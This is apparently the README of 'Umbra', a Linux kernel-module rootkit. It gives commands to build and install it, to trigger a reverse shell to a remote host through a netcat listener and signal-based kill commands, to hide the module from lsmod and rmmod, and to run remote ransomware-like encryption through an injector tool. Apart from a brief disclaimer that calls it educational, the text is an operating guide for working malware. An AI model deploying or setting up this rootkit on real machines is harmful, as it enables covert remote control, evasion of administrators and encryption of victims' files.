A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.
Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more.
The rootkit is still under development, although the features listed below are already fully operational.
Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.
More functionalities will come in later updates.
This rookit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.
Also bear in mind that Umbra only incorporates light hiding and protection mechanisms. It is not intended to be used on a real scenario.
IMPORTANT: If you are going to test this rootkit in your own machine, I strongly recommend to use a VM.
About the Umbra Modules: The ransom module uses a trivial encryption mechanism but it can and will certainly encrypt any folder in your machine. Although files can be easily decrypted, I definitely do not recommend running this towards your root folder or similar unless on a controlled environment.
Remember that you should have a 4.x or 5.x kernel available.
apt install linux-headers-$(uname -r)
Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check .vscode/c_cpp_properties.json
for an example on which directories to include.
Clone the project
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
make
sudo ./install.sh
If you have previously run the script and wish to just install Umbra in the kernel, you can run:
sudo insmod ./umbra.ko
Make sure Umbra is not in invisible mode, otherwise this will fail.
sudo rmmod umbra
kill -50 1
Set your desired IP and port in CONFIG.H before building the rootkit. By default 127.0.0.1:5888
Start listening at the remote host.
nc -lvp 5888
kill -51 1
Note: Umbra also tries to start the reverse shell on load.
This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.
kill -52 1
This reverts the invisible mode if active.
kill -53 1
The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.
./injector -S 127.0.0.1
The backdoor listens for packets with the following payload:
UMBRA_PAYLOAD_GET_REVERSE_SHELL
.
You can also build your own injector using my library RawTCP.
This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.
./injector -i 127.0.0.1
This reverts the invisible mode if active.
./injector -u 127.0.0.1
You can see the full information on how to run the Umbra Injector by:
./injector -h
The Umbra Modules will be stored by the install.sh script on /tmp/umbra, where Umbra will hide them. The directory will not visible by commands such as ls or similar.
This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the .ubr extension.
Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1
The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used: How to create LKMs:
Linux syscall reference:
Some rootkit references:
This project is licensed under the GPLv2 license. See LICENSE